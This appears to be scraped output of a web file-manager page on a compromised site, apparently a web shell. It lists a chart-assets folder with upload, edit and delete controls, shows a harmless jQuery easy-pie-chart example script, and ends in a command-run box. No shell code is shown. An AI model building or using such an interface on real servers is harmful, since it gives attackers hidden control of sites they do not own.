/
home
/
aqcert
/
public_html
/
admin
/
dash
/
assets
/
easypie-chart
/
/home/aqcert/public_html/admin/dash/assets/easypie-chart
mkdir
upload
Name
Size
Mode
Actions
easypiechart.min.js
3736
0644
edit
dl
rm
example.js
1474
0644
edit
dl
rm
jquery.easypiechart.min.js
3918
0644
edit
dl
rm
Edit:
/home/aqcert/public_html/admin/dash/assets/easypie-chart/example.js
(1474B)
/** * Theme: Montran Admin Template * Author: Coderthemes * Easy pie chart */ !function($) { "use strict"; var EasyPieChart = function() {}; EasyPieChart.prototype.init = function() { //initializing various types of easy pie charts $('.easy-pie-chart-1').easyPieChart({ easing: 'easeOutBounce', barColor : '#8CC152', lineWidth: 3, onStep: function(from, to, percent) { $(this.el).find('.percent').text(Math.round(percent)); } }); $('.easy-pie-chart-2').easyPieChart({ easing: 'easeOutBounce', barColor : '#F6BB42', lineWidth: 3, trackColor : false, lineCap : 'butt', onStep: function(from, to, percent) { $(this.el).find('.percent').text(Math.round(percent)); } }); $('.easy-pie-chart-3').easyPieChart({ easing: 'easeOutBounce', barColor : '#E9573F', lineWidth: 10, lineCap : 'square', onStep: function(from, to, percent) { $(this.el).find('.percent').text(Math.round(percent)); } }); $('.easy-pie-chart-4').easyPieChart({ easing: 'easeOutBounce', barColor : '#3BAFDA', lineWidth: 20, onStep: function(from, to, percent) { $(this.el).find('.percent').text(Math.round(percent)); } }); }, //init $.EasyPieChart = new EasyPieChart, $.EasyPieChart.Constructor = EasyPieChart }(window.jQuery), //initializing function($) { "use strict"; $.EasyPieChart.init() }(window.jQuery);
Save
cmd:
run